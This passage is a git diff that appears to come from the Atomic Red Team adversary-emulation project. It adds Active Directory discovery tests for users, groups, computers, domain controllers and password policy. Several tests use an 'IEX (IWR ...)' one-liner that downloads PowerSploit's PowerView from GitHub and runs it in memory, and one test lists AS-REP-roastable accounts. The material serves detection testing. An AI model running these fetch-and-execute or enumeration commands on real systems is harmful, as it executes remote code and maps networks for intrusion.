-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -565,6 +568,8 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
@@ -578,7 +583,10 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0c8c1184..599eca55 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1283,7 +1283,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1293,9 +1294,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1355,6 +1358,8 @@
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
   - Atomic Test #7: Examine password policy - macOS [macos]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1379,7 +1384,10 @@
   - Atomic Test #13: Remote System Discovery - ip route [linux]
   - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9aca2c0d..0b9cc997 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -907,7 +907,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-  - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -917,9 +918,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-  - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-  - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-  - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -958,6 +961,8 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -976,7 +981,10 @@
   - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
   - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-  - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 32ccfe39..c4eb414d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -55101,6 +55101,19 @@ discovery:
           -Server #{domain}
 
 '
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+      description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
+        users. Upon execution, Users within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+        name: powershell
     - name: Enumerate Active Directory Users with ADSISearcher
       auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
       description: |
@@ -55306,6 +55319,19 @@ discovery:
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
+    - name: Enumerate Active Directory Groups with Get-AdGroup
+      auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+      description: |
+        The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: 'Get-AdGroup -Filter *
+
+'
     - name: Enumerate Active Directory Groups with ADSISearcher
       auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
       description: |
@@ -55371,6 +55397,19 @@ discovery:
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
         name: powershell
+    - name: Get-DomainGroup with PowerView
+      auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+      description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
+        groups. Upon execution, Groups within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+        name: powershell
   T1482:
     technique:
       external_references:
@@ -56940,6 +56979,32 @@ discovery:
       executor:
         command: pwpolicy getaccountpolicies
         name: bash
+    - name: Get-DomainPolicy with PowerView
+      auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+      description: 'Utilizing PowerView, run Get-DomainPolicy to return the default
+        domain policy or the domain controller policy for the current domain or a
+        specified domain/domain controller.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+        name: powershell
+    - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+      auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+      description: |
+        The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+        Upon successful execution a listing of the policy implemented will display.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-addefaultdomainpasswordpolicy
   T1120:
     technique:
       created: '2017-05-31T21:31:28.471Z'
@@ -57612,6 +57677,20 @@ discovery:
             Write-Host $Computer}
         name: powershell
         elevation_required: false
+    - name: Enumerate Active Directory Computers with Get-AdComputer
+      auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+      description: |
+        The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+        Upon successful execution a listing of Computers will output with their paths in AD.
+        Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-AdComputer -Filter *
+
+'
     - name: Enumerate Active Directory Computers with ADSISearcher
       auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
       description: |
@@ -57623,7 +57702,35 @@ discovery:
       executor:
         name: powershell
         elevation_required: false
-        command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+        command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+
+'
+    - name: Get-DomainController with PowerView
+      auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+      description: 'Utilizing PowerView, run Get-DomainController to identify the
+        Domain Controller. Upon execution, information about the domain controller
+        within the domain will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+        name: powershell
+    - name: Get-wmiobject to Enumerate Domain Controllers
+      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+      description: |
+        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+        Upon successful execution a listing of Systems from AD will output with their paths.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-wmiobject -class ds_computer -namespace root\directory\ldap
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 3055bdc6..d835dbd4 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,7 +36,13 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
 
 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
 
-- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+- [Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-16---enumerate-active-directory-computers-with-get-adcomputer)
+
+- [Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-17---enumerate-active-directory-computers-with-adsisearcher)
+
+- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
+
+- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
 
 
 <br/>
@@ -639,7 +645,37 @@ write-host "This PC must be manually added to a domain."
 <br/>
 <br/>
 
-## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+## Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
+The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+Upon successful execution a listing of Computers will output with their paths in AD.
+Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdComputer -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
 Upon successful execution a listing of computers will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
@@ -666,4 +702,63 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #18 - Get-DomainController with PowerView
+Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+Upon successful execution a listing of Systems from AD will output with their paths.
+Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-wmiobject -class ds_computer -namespace root\directory\ldap
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 999930da..b7d9a435 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,11 +22,15 @@ Commands such as <code>net group /domain</code> of the [Net](https://attack.mitr
 
 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
 
-- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)
 
-- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)
 
-- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)
+
+- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)
 
 
 <br/>
@@ -317,7 +321,37 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
 <br/>
 <br/>
 
-## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher
+## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup
+The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+Upon successful execution a listing of groups will output with their paths in AD.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-AdGroup -Filter *
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
 Upon successful execution a listing of groups will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
@@ -347,7 +381,7 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc
 <br/>
 <br/>
 
-## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
+## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
 When successful, accounts that do not require kerberos pre-auth will be returned.
 Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
 
@@ -397,7 +431,7 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
 <br/>
 <br/>
 
-## Atomic Test #11 - Get-DomainGroupMember with PowerView
+## Atomic Test #12 - Get-DomainGroupMember with PowerView
 Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
 
 **Supported Platforms:** Windows
@@ -423,4 +457,33 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - Get-DomainGroup with PowerView
+Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 55e4e2bd..8c53c827 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -26,7 +26,9 @@ Commands such as <code>net user /domain</code> and <code>net group /domain</code
 
 - [Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10---enumerate-active-directory-for-unconstrained-delegation)
 
-- [Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-11---enumerate-active-directory-users-with-adsisearcher)
+- [Atomic Test #11 - Get-DomainUser with PowerView](#atomic-test-11---get-domainuser-with-powerview)
+
+- [Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher](#atomic-test-12---enumerate-active-directory-users-with-adsisearcher)
 
 
 <br/>
@@ -446,7 +448,36 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
 <br/>
 <br/>
 
-## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher
+## Atomic Test #11 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 93662494-5ed7-4454-a04c-8c8372808ac2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
 Upon successful execution a listing of users will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index e2953cf8..3f1dc931 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -20,6 +20,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
 
 - [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos)
 
+- [Atomic Test #8 - Get-DomainPolicy with PowerView](#atomic-test-8---get-domainpolicy-with-powerview)
+
+- [Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy](#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy)
+
 
 <br/>
 
@@ -241,4 +245,63 @@ pwpolicy getaccountpolicies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Get-DomainPolicy with PowerView
+Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+Upon successful execution a listing of the policy implemented will display.
+Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b2698b33-984c-4a1c-93bb-e4ba72a0babb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+get-addefaultdomainpasswordpolicy
+```
+
+
+
+
+
+
 <br/>

From f6a8e78538d71f5b1518c1e078fa1767c3ccc9ef Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Mon, 14 Mar 2022 18:38:08 +0100
Subject: [PATCH 31/83] pnputil lolbin (#1808)

* pnputil lolbin

* spelling

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1547/T1547.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 atomics/T1547/T1547.yaml

